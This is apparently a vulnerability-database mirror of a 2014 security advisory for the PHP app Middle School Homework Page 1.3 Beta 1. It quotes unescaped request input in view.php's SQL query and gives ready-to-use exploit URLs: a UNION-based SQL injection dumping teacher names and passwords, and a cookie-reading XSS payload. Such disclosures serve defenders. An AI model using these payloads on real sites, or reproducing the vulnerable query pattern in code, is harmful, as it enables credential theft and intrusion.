Lucene search
K

Middle School Homework Page 1.3 Beta 1 Cross Site Scripting / SQL Injection

🗓️ 07 Jan 2014 00:00:00Reported by AtT4CKxT3rR0r1STType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

Middle School Homework Page V1.3 Beta 1 - multiple vulnerabilities including SQL Injection and Cross Site Scriptin

Code
`Middle School Homework Page V1.3 Beta 1 - Multiple Vulnerabilties  
===================================================================  
  
####################################################################  
.:. Author : AtT4CKxT3rR0r1ST  
.:. Contact : [[email protected]] , [[email protected]]  
.:. Home : http://www.iphobos.com/blog/  
.:. Script : http://sourceforge.net/projects/mshwpage/  
####################################################################  
  
I. Sql Injection  
  
##############  
VULNERABILITY  
##############  
/view.php (line 3-4)  
-----------------------------------------------------------------------------  
  
<h2>Homework for <?php get_array("select * from class where  
classID=$_REQUEST[class]", 'classDesc') ?> as of <?php $today = date("M j  
G:i:s T Y");echo $today; ?>:</h2>  
<?php  
  
-----------------------------------------------------------------------------  
  
#########  
EXPLOIT  
#########  
(  
localhost/mshwpage/view.php?class=null+and+1=2+union+select+1,concat(name,0x3a,pass)+from+teachinfo  
  
  
II. Cross Site Scripting  
  
localhost/mshwpage/view.php?class=<script>alert(document.cookie);</script>  
  
####################################################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation